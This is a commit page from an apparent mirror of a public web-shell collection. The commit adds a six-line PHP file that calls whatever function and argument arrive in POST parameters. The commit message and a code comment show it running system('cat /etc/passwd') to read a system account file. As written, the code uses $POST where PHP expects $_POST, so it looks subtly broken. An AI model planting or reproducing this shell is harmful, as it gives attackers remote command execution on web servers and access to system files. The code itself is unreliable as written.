mirror of
https://github.com/tennc/webshell
synced 2025-02-16 09:48:24 +00:00
Create simple_2022_08_15.php
running : system('cat /etc/passwd') ![img](https://raw.githubusercontent.com/tennc/webshell/master/php/Fig4-web-shell-example-2.png)
This commit is contained in:
parent
95f12107a7
commit
39cf8cacca
1 changed files with 6 additions and 0 deletions
6
php/simple_2022_08_15.php
Normal file
6
php/simple_2022_08_15.php
Normal file
|
@ -0,0 +1,6 @@
|
|||
<?php
|
||||
$_=$POST['1'];
|
||||
$__=$POST['2'];
|
||||
// running -> system('cat /etc/passwd');
|
||||
$_($__);
|
||||
?>
|
Loading…
Add table
Reference in a new issue